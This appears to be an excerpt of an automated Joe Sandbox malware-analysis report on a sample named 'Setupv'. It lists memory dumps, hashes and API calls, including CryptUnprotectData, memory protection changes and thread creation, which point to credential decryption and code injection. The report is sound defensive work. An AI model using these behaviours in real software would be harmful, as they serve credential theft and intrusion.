                                                                                                                                                                                                                          • Instruction ID: 46f0b82d7a23d3ddcaba146e6aee875310b6fa05235aa11a389a1a30d7dbe945
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8441A474A00209EFDB14CF98C994BAEB7B1FF88318F208598D515AB391D775AE81CF94
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • NtProtectVirtualMemory.NTDLL ref: 00BA0792
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1852349232.0000000000BA0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_ba0000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                          • API String ID: 2706961497-2766056989
                                                                                                                                                                                                                          • Opcode ID: 6fc9c57550b909a1d670a4aba9240b9ab9b539ccd3cf5fce8b7c1e3a4c4e1d70
                                                                                                                                                                                                                          • Instruction ID: 504956d1c6923e5b14d24976dfb6abf2238ed143a807b410d5244887e4631139
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6fc9c57550b909a1d670a4aba9240b9ab9b539ccd3cf5fce8b7c1e3a4c4e1d70
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC4126B0A1821A8BEB10DF59C8857AEB7F1FB85304F2485A5D425E7380E378EE55DF81
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL ref: 00BA0DA0
                                                                                                                                                                                                                          • NtFreeVirtualMemory.NTDLL ref: 00BA0F55
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1852349232.0000000000BA0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_ba0000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MemoryVirtual$AllocateFree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 292159236-0
                                                                                                                                                                                                                          • Opcode ID: fdcd9481dd92780094e8dcbedfd057ca5f8d098582d8ea202342eb96a1c60491
                                                                                                                                                                                                                          • Instruction ID: f6417be1233139c3156799d47c9b65add9f058a7aff7a207f97835063ccae381
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fdcd9481dd92780094e8dcbedfd057ca5f8d098582d8ea202342eb96a1c60491
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 608192B4D182099FDB10EFA9C1847AEBBF0EF45304F10C969E894A7380E7799945DF92
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: GFIH$a+<Z
                                                                                                                                                                                                                          • API String ID: 0-4196300823
                                                                                                                                                                                                                          • Opcode ID: 6a7255fcdcbc1fd7c6612f720e64b1f3d4e7d05573a9353ad482d2c00b7ee2b8
                                                                                                                                                                                                                          • Instruction ID: a32f83c84d465ab446a060950b980a426514d4fb9bef35b6535842fff7485f04
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a7255fcdcbc1fd7c6612f720e64b1f3d4e7d05573a9353ad482d2c00b7ee2b8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E615D76F902104BC7249B248CD07BF73A3EFC5708F09A53CF44A5B342DE78A9168692
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID: HIJK
                                                                                                                                                                                                                          • API String ID: 2994545307-3946259990
                                                                                                                                                                                                                          • Opcode ID: 0a0860e62ae4efd9a5e4f10aa3762b047a6e25cbaba863e48e3370f87e0bb34d
                                                                                                                                                                                                                          • Instruction ID: 35e7221883a7a65817d831a2c4d580a69203fd39d50e81c03de4a2adc7838b1f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a0860e62ae4efd9a5e4f10aa3762b047a6e25cbaba863e48e3370f87e0bb34d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5C114726587118BD718DF29D8A166BF7E2EBC9318F19D93CE9D6C7340EB3498018B42
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 02E2CEE0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CryptDataUnprotect
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 834300711-0
                                                                                                                                                                                                                          • Opcode ID: 9ee5c102be951cfbea3aa2be22e2bebfdc507f4ea38d2e8ef350a100996c033d
                                                                                                                                                                                                                          • Instruction ID: 030c28305580db374ed685798d5074a1d51b425c6c9046e626f39ebb007e54d6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ee5c102be951cfbea3aa2be22e2bebfdc507f4ea38d2e8ef350a100996c033d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D51A1B5604B408FD734CF28C491B66BBE2AF46314B159A5EC8AB8B782D735F809CB51
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 02E2AEF0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CryptDataUnprotect
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 834300711-0
                                                                                                                                                                                                                          • Opcode ID: 536a2f5607a04f133a1ceeaa6ef3882a23e4c4153af3e150d3d7dc44cd3d8bd7
                                                                                                                                                                                                                          • Instruction ID: 2d78abdee99237f93a18523e0f3db1727a13f3de44ae4fd7062250ee545c53da
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 536a2f5607a04f133a1ceeaa6ef3882a23e4c4153af3e150d3d7dc44cd3d8bd7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD518DB1644B518FC730CF28C491B52B7E2AF9A319B14CA6DC4AA4B782D735F80ACB50
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID: HIJK
                                                                                                                                                                                                                          • API String ID: 2994545307-3946259990
                                                                                                                                                                                                                          • Opcode ID: 070ebe9c7aa2fa6fb4e2c0f90fcdd0f0e9ad2387910c2f1a505b3879069434cd
                                                                                                                                                                                                                          • Instruction ID: 2dcd572d47d1104c4999d9d4b1fcb91c39af788262336d68fb69ba5665e39d9a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 070ebe9c7aa2fa6fb4e2c0f90fcdd0f0e9ad2387910c2f1a505b3879069434cd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68B13576A583205BD318CE29C89062BB7E3EFC9718F29E92DE99957351DB34DC02C742

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 103 2731f13-2731f5d NtAllocateVirtualMemory 104 2731f62-2731f65 103->104 105 2731f5f 103->105 105->104
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?,?,?,?,?,?,027317B8), ref: 02731F53
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1854155673.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2730000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2167126740-0
                                                                                                                                                                                                                          • Opcode ID: 78c8386d0ca1b99d43cca6ce6c16f3e2a29a059ffab71e1188b5232a7c8a9d42
                                                                                                                                                                                                                          • Instruction ID: 1a5c6d6397c414b4d6047e29db1711819f9a361232bcb2515ed8272b797d9372
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78c8386d0ca1b99d43cca6ce6c16f3e2a29a059ffab71e1188b5232a7c8a9d42
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24F042B4A0430A9FCB00DF69C94568EBBF5FB48214F408A6AE968D7354E730E9558F92

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 106 2731fa4-2731fe8 NtProtectVirtualMemory
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • NtProtectVirtualMemory.NTDLL ref: 02731FDC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1854155673.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2730000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2706961497-0
                                                                                                                                                                                                                          • Opcode ID: 8f2ea2754926a877baefb0e95928ead137db2cace9ea492a83a54183cb659431
                                                                                                                                                                                                                          • Instruction ID: b73923b625de7dfd01070dc29760b2b5d7ea25a86910c92077b7240c170e2adb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f2ea2754926a877baefb0e95928ead137db2cace9ea492a83a54183cb659431
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4F07FB89043099FCB00EF68C44588EBBF4FB48210F408A6AF8A9D7350E730E955CF92

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 107 2731f66-2731fa3 NtFreeVirtualMemory
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1854155673.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2730000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeMemoryVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3963845541-0
                                                                                                                                                                                                                          • Opcode ID: d9c968aadc259ab462be9a4cf4e628caa8dad256438333e783c6dd0bae5309bf
                                                                                                                                                                                                                          • Instruction ID: a73c57ac8b2768bb2445ee7bd78b640fd1fd9f77e869fe91dff036b035bf2780
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9c968aadc259ab462be9a4cf4e628caa8dad256438333e783c6dd0bae5309bf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EE0C9B48042099FCB40EF69C44449EBBF4FB08210F40CA6AF8A8D7350E730D505CF91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 02E2D097
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CryptDataUnprotect
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 834300711-0
                                                                                                                                                                                                                          • Opcode ID: 461cf2138695a97f3721f766033a69bbd00485aab12a4607dfb905e3fbb0bfbb
                                                                                                                                                                                                                          • Instruction ID: 251989ea8d22a4313b6719b9a0b242ce125b3e8ade41d7ea0560d8998de42bce
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 461cf2138695a97f3721f766033a69bbd00485aab12a4607dfb905e3fbb0bfbb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17D05EB6581702EBE3105F22ED15B07B7A6BF81311F248828F45992190DB7164748A50
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LdrInitializeThunk.NTDLL(02E5C9F5,75E10000,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 02E57C06
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: 206942d54d9deabbe1c5a56ac1790a9d367dccf5c64ac69c9dfc2e5b1dec7064
                                                                                                                                                                                                                          • Instruction ID: c4a499aa5db74637f5108a5eea374eb221324e7f2d70c18a5f8eca3ad050637a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 206942d54d9deabbe1c5a56ac1790a9d367dccf5c64ac69c9dfc2e5b1dec7064
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CCE02D71908216EF9E04CF45C24484EFBE5AB84758F158C8DA488B7210C3B0AD4AEB82
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: GFIH
                                                                                                                                                                                                                          • API String ID: 0-170685188
                                                                                                                                                                                                                          • Opcode ID: 8ace602b8c6a7fb48209ce8f062dd785943e8523b2283aa17eebba098ecac0be
                                                                                                                                                                                                                          • Instruction ID: 367e024d76d36f338b3235d034f5d62cb9282077ebdf9f2cc317abfb60021696
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ace602b8c6a7fb48209ce8f062dd785943e8523b2283aa17eebba098ecac0be
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B071DF76A583608FD330CF68C9907DAB7E1FBC4708F056A1DE48DDB241D7B898488B92
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                          • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                          • Opcode ID: 73b51c8bb16dd0061a5c65b2e9f673967572831dfe1feb9312e74e16a250b159
                                                                                                                                                                                                                          • Instruction ID: 6976af39c14324dbc5a64f2cf25670c41b7c7a00727af5dcf477bad82a76ce08
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73b51c8bb16dd0061a5c65b2e9f673967572831dfe1feb9312e74e16a250b159
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F21EE71899360ABD314CF49C88066BF7E5EFC9728F14991DECD467250C374AC448BA2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: e83c270595c490937078877d23dacbf5d841c00e405f67ec790e7fffc29c0d33
                                                                                                                                                                                                                          • Instruction ID: f56e2cc552f6d570fe8e7ccc77fe7fd3c841c74f2f7c08adcf785d5a4a27b525
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e83c270595c490937078877d23dacbf5d841c00e405f67ec790e7fffc29c0d33
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35D17972A883108FD316CE288C546ABB7E2EFC6319F09DA2DD8D997345E374D801C792
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d9a27eae20fe0425396c4ea8e3999cfc1be7e5381ccc90d56f2ee0e8158c26ec
                                                                                                                                                                                                                          • Instruction ID: e028ba343ae2d7cdf82a9bbe28411a8d2ff768c601443c20856e5b721be95756
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9a27eae20fe0425396c4ea8e3999cfc1be7e5381ccc90d56f2ee0e8158c26ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7281A772BD83208FD728DE68D88072BB3D2ABC5318F19C52DDD855B392E7759C828791
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 6b80b3b6d91d0fd193a8b681c1c04bfd868b6a8fcca00c5b949627a76fa1b91c
                                                                                                                                                                                                                          • Instruction ID: 9925a3fee4b38c7a4fb479399ae184448cf93cd75395fd88be30536d71b07f30
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b80b3b6d91d0fd193a8b681c1c04bfd868b6a8fcca00c5b949627a76fa1b91c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8091F4766807118BD7248F28C89176273E3FF9932CF19965DD8A78B3A1E335A809CB40
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b4909e4ccc5f53baf10a47dd25461e878d466414a23362f7e1bd931339d9774f
                                                                                                                                                                                                                          • Instruction ID: ea0aa16a10d72bff7eef14ea13665ece041d35079e64c22086bd6118745c6369
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4909e4ccc5f53baf10a47dd25461e878d466414a23362f7e1bd931339d9774f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B4127307D83606BE3289A298C50B2BBBD39FC8758F24D81CE895D7291C774D8828B65
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 65fdfa40a41649d29dbcc12e5f31aad205f1b9da90a4d555d45df0711392b113
                                                                                                                                                                                                                          • Instruction ID: 870ed58ede2547885aaa3f7ae1b59cdf01deefd91d0146040e745aa19a759ca9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65fdfa40a41649d29dbcc12e5f31aad205f1b9da90a4d555d45df0711392b113
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 074167B95183809BE768DF66E855BABBAE2FBC5244F949D1CD4C8AB344DB308045CB13
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1852349232.0000000000BA0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_ba0000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                                                          • Opcode ID: 0f8eb1b02dcac5d20f4e2f5630590db36448e49fcf5e73f1774963130d86fabc
                                                                                                                                                                                                                          • Instruction ID: 413b60094d856d10e3287b62ff6430ede69c0e841c66c782dcf6bf6c940ed9cb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f8eb1b02dcac5d20f4e2f5630590db36448e49fcf5e73f1774963130d86fabc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E41AAB49443599FDB00EF68C99879EBBF0FF45314F0085A9E854AB340E3759A84CF95
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1852349232.0000000000BA0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_ba0000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b474b0f1e3aae90d1c1f35aede222e0c13cc140969cb3bd75f15b6981ee04c14
                                                                                                                                                                                                                          • Instruction ID: bde4745a7d86b75536bc2fc5b6027f043eacde08a94d426715e1751da4c20321
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b474b0f1e3aae90d1c1f35aede222e0c13cc140969cb3bd75f15b6981ee04c14
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4EF0BDB09083199BDB40AFA9D54975DBBF4EB05308F008858E950AB341E3B595848B52
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4096458114261ea1f6749e323ccb0c6dfc934ba05f3675cebd11a4e33b0ee6bf
                                                                                                                                                                                                                          • Instruction ID: 1b66fb67830ed3a167e17eb8f6bc645fb5aadbf03634aae5f2c08b4224bebe46
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4096458114261ea1f6749e323ccb0c6dfc934ba05f3675cebd11a4e33b0ee6bf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85E04F706543419FD7188E35DC14BBBB3B9EB8A300F445A5CB946D31C0DB32AC508A54
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Object$DeleteSelect
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 618127014-3916222277
                                                                                                                                                                                                                          • Opcode ID: 226afa26aceebc261228800027b0b2461a7c55b4b24dbd8d54aa4ebf5a4d6053
                                                                                                                                                                                                                          • Instruction ID: 0f8c3ae6777ea6a2bc90e1cb725dec859cedcd4846d221fcea1a5a417ae18766
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 226afa26aceebc261228800027b0b2461a7c55b4b24dbd8d54aa4ebf5a4d6053
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D61A1B0598380CBD320EF69D64979FBBE0BB85344F50992DE9889B250D7749898CF86
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1852349232.0000000000BA0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_ba0000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                                                          • Opcode ID: 7bd0af22782f5c8a35ba0121cc4a7b8a089474b53753b6665cdd4ac5bf2ef12f
                                                                                                                                                                                                                          • Instruction ID: 2ded62a428d18afd3ea696034623d81d51ca596c1cdbf2c6e0b7585f8bfff734
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bd0af22782f5c8a35ba0121cc4a7b8a089474b53753b6665cdd4ac5bf2ef12f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42316FB490831ACFCB50DF9CC585A9EBBF0FB49314F108969E868A7350D3749985CF62
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02E216E9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
